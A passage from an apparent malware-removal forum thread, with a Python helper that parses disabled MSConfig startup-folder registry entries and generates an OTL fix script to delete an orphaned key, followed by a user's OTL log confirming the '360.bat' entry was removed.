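    """One dict per disabled startup-folder item: registry key, original path, values."""
    entries, current = [], None
    for line in section.splitlines():
        m = KEY_LINE.match(line.strip())
        if m:
            # MSConfig names the subkey after the original file path, with '\' -> '^'.
            current = {"key": m.group(1), "path": m.group(2).replace("^", "\\"), "values": {}}
            entries.append(current)
            continue
        m = VALUE_LINE.match(line.strip())
        if m and current is not None:
            # A .reg-style export doubles the backslashes inside string values.
            current["values"][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return entries


def otl_reg_fix(entries: list, items: set) -> str:
    """OTL fix text that deletes the keys whose "item" value is in `items`."""
    lines = [":Reg"]
    for e in entries:
        if e["values"].get("item") in items:
            lines.append("[-" + e["key"] + "]")
    lines += ["", ":Commands", "[reboot]"]
    return "\n".join(lines)


if __name__ == "__main__":
    found = parse_startupfolder(SAMPLE_SECTION)
    for e in found:
        print(e["path"], "->", e["values"].get("backup", "(no backup recorded)"))
    print(otl_reg_fix(found, {"360"}))
```

In this thread the key pointed at a backup in C:\Windows\pss that Zoek reported as not found, so deleting the orphaned key is all that was left to do for that item.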
#30 By gvl
11/06/2013 - 11:25
Hello, Wings,

========== REGISTRY ==========
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^360.bat\ deleted successfully.
========== COMMANDS ==========

OTL by OldTimer - Version 3.2.69.0 log created on 06112013_112239